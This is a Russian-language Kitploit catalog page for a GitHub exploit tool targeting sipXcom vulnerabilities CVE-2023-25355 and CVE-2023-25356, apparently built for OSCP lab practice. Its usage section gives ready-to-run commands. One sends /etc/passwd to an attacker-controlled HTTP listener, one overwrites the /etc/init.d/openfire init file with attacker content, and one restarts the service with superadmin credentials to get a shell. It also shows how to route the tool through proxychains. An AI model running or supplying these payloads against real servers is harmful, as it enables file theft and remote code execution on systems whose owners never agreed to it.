Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-25355-25356 — CVE-2023-25355 и CVE-2023-25356 с автоматической перезагрузкой сервиса | Kitploit
Инструменты/GitHubGitHub/glefait/cve-2023-25355-25356
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubglefait/cve-2023-25355-25356

CVE-2023-25355-25356

CVE-2023-25355 и CVE-2023-25356 с автоматической перезагрузкой сервиса

Репозиторий
11 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Эксплойт и благодарности

Эксплойт был найден [email protected] и представлен в двух замечательных материалах:

  • статья с полным раскрытием
  • слайды DEFCON31

Репозиторий для ещё большей автоматизации этой уязвимости опубликовал Alex Linov:

  • https://github.com/AlexLinov/sipXcom-RCE

Цель

CVE-2023-25355 — это механизм эксфильтрации, при котором файлы с сервера sipXcom загружаются на веб-сервер, контролируемый атакующим.

CVE-2023-25356 — это расширение первой уязвимости, позволяющее записывать файлы, контролируемые атакующим, в файловую систему сервера sipXcom. Поскольку служба sipXcom может перезаписывать свою собственную конфигурацию инициализации, получить оболочку можно легко, как только служба будет перезапущена.

Интересный момент здесь в том, что суперадминистратор sipXcom может перезапускать эту службу. Поэтому цель этого пакета — полностью автоматизировать перезапуск этой службы.

но зачем её полностью автоматизировать?

Для подготовки к OSCP существуют лаборатории с машинами для взлома.

В одной конкретной лаборатории машина, подверженная этой уязвимости, была довольно нестабильной, что означало, что иногда приходилось запускать и возвращать лабораторию несколько раз. Это раздражает. При автоматизации это менее раздражает.

Требования

Вам потребуется:

  • веб-сервер, доступный с целевой машины, способный передавать и/или принимать файлы.
  • python и poetry

Использование

Установка

root@kitploit:~
poetry install

Затем вы можете запустить инструмент из активного окружения, из текущего каталога или из другого места, используя имя CVE:

root@kitploit:~
# if the poetry environment is active (poetry shell)
cve_2023_25355 --help

# otherwise, from the current directory
poetry run cve_2023_25355 --help

# otherwise from another directory
poetry -C /shared/tools/CVE/CVE-2023-25355 run cve_2023_25355 --help

CVE-2023-25355

В следующем примере мы отправляем полезную нагрузку для эксфильтрации файла /etc/passwd, который будет загружен на контролируемый HTTP-слушатель.

root@kitploit:~
cve_2023_25355 \
    --xmpp-username my_username --xmpp-password my_password --xmpp-target-username friend_username \
    --xmpp-server-address 1.2.3.4 \
    --payload '--data-binary @/etc/passwd http://ATTACKER-WEB-LISTENER/some_path'

CVE-2023-25356

В следующем примере мы отправляем полезную нагрузку для перезаписи файла /etc/init.d/openfire содержимым указанного URI.

root@kitploit:~
cve_2023_25356 \
    --xmpp-username my_username --xmpp-password my_password --xmpp-target-username friend_username \
    --xmpp-server-address 1.2.3.4 \
    --sipxcom-init-file-source-uri 'http://ATTACKER-WEB-LISTENER/my-offensive-sipx-config'

Затем, если мы знаем пароль суперадминистратора, мы можем перезапустить службу, чтобы перезагрузить конфигурацию и запустить любой гаджет.

root@kitploit:~
run sipxcom_service_restart \
    --sipxcom-superuser-username superadmin \
    --sipxcom-superuser-password superadmin_password \
    --sipxcom-website https://1.2.3.4/
    --debug-local-directory /tmp

Совместное использование с proxychains

root@kitploit:~
./proxychains4 -f proxychains.conf cve_2023_25355 [...] --xmpp-server-address 172.1.2.3

Проект:

  • https://github.com/rofl0r/proxychains-ng
Скачать инструмент